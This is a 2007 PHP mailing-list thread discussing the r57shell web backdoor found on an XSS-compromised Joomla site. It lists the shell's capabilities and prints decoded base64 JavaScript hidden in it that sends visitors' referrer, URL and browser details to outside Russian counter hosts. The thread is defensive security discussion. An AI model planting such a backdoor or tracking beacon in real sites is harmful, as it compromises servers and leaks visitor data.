NYCPHP Meetup

NYPHP.org

[nycphp-talk] [OT] XSS, Joomla & Remote Shells

Ben Sgro (ProjectSkyline) ben at projectskyline.com
Fri Jun 29 10:21:19 EDT 2007 

Hello,

Its funny you mentioned this because I kinda assumed it might behave that 
way.

I've seen shellcode in the past that did things you didn't know about...

Great link, thanks!

I decided to see what was encoded in the $c1, $c2 variables,
which were base64 encoded strings. This is what they held:

<script 
language="javascript">hotlog_js="1.0";hotlog_r=""+Math.random()+"&s=81606&im=1&r="+escape(document.referrer)+"&pg="+escape(window.location.href);document.cookie="hotlog=1; 
path=/"; hotlog_r+="&c="+(document.cookie?"Y":"N");</script><script 
language="javascript1.1">hotlog_js="1.1";hotlog_r+="&j="+(navigator.javaEnabled()?"Y":"N")</script><script 
language="javascript1.2">hotlog_js="1.2";hotlog_r+="&wh="+screen.width+'x'+screen.height+"&px="+(((navigator.appName.substring(0,3)=="Mic"))?screen.colorDepth:screen.pixelDepth)</script><script 
language="javascript1.3">hotlog_js="1.3"</script><script 
language="javascript">hotlog_r+="&js="+hotlog_js;document.write("<a 
href='http://click.hotlog.ru/?81606' target='_top'><img "+" 
src='http://hit4.hotlog.ru/cgi-bin/hotlog/count?"+hotlog_r+"&' border=0 
width=1 height=1 alt=1></a>")</script><noscript><a 
href=http://click.hotlog.ru/?81606 
target=_top><imgsrc="http://hit4.hotlog.ru/cgi-bin/hotlog/count?s=81606&im=1" 
border=0width="1" height="1" 
alt="HotLog"></a></noscript><Br><br><!--LiveInternet counter--><script 
language="JavaScript"><!--
document.write('<a href="http://www.liveinternet.ru/click" '+
'target=_blank><img src="http://counter.yadro.ru/hit?t52.6;r'+
escape(document.referrer)+((typeof(screen)=='undefined')?'':
';s'+screen.width+'*'+screen.height+'*'+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+';'+Math.random()+
'" alt="liveinternet.ru: ïîêàçàíî ÷èñëî ïðîñìîòðîâ è ïîñåòèòåëåé çà 24 ÷àñà" 
'+
'border=0 width=0 height=0></a>')//--></script><!--/LiveInternet-->

- Ben

Ben Sgro, Chief Engineer
ProjectSkyLine - Defining New Horizons

Our company: www.projectskyline.com
Our products: www.project-contact.com

This e-mail is confidential information intended only for the use of the 
individual to whom it is addressed.

----- Original Message ----- 
From: "inforequest" <1j0lkq002 at sneakemail.com>
To: <talk at lists.nyphp.org>
Sent: Friday, June 29, 2007 3:18 AM
Subject: Re: [nycphp-talk] [OT] XSS, Joomla & Remote Shells


> Ben Sgro (ProjectSkyline) ben-at-projectskyline.com |nyphp dev/internal 
> group use| wrote:
>
>> Hello again,
>>  I've always had an interest in security. Not too long ago a friend was 
>> looking
>> into deploying joomla for a client. He's a pentester/researcher for a 
>> very well
>> educated and influential firm = ] , so he had to make sure it was going 
>> to be secure.
>>  He started researching and found that many joomla installs had/have been 
>> comprimised
>> via XSS attacks.
>>  Today, he posted the link of a site that had been owned by XSS and the 
>> crackers installed this
>> web based backdoor script.
>>  I grabbed the script and included it here 
>> http://www.projectskyline.com/phplist/r57shell.txt to show PHP developers 
>> AGAIN how important security is and give us an inside look at
>> some of the tools our enemies are armed with.
>>  For those that deploy joomla, this is especially something to watch for.
>> For everyone else, just something to checkout.
>>  You'll notice this script enables:
>>  - Mail to be sent out (w/or w/out files attached)
>> - Commands to be run.
>> - Search for SUID, writable directories, files, tmp files., .(files) ...
>> - Outgoing connections to be established
>> - Some kind of IRC implementation
>> - SQL to be run
>> - Files can be downloaded and uploaded
>> - and much, much more.
>>  - Ben
>>
>
> Perhaps most interesting about that r57shell is that it quietly  remotely 
> logs its own use. So in addition to the use as a backdoor shell script, it 
> becomes a beacon for compromised systems - the tool maker gets a notice of 
> every IP compromised by the tool when used by others.
>
> To quote full disclosure, "they [the script authors] can 0wn everything 
> you 0wned...Trust no one... write your own tools."
>
> http://seclists.org/fulldisclosure/2006/Sep/0083.html
>
>
>
>
>
>
> -- 
> -------------------------------------------------------------
> Your web server traffic log file is the most important source of web 
> business information available. Do you know where your logs are right now? 
> Do you know who else has access to your log files? When they were last 
> archived? Where those archives are? --John Andrews Competitive Webmaster 
> and SEO Blogging at http://www.johnon.com
>
> _______________________________________________
> New York PHP Community Talk Mailing List
> http://lists.nyphp.org/mailman/listinfo/talk
>
> NYPHPCon 2006 Presentations Online
> http://www.nyphpcon.com
>
> Show Your Participation in New York PHP
> http://www.nyphp.org/show_participation.php

More information about the talk mailing list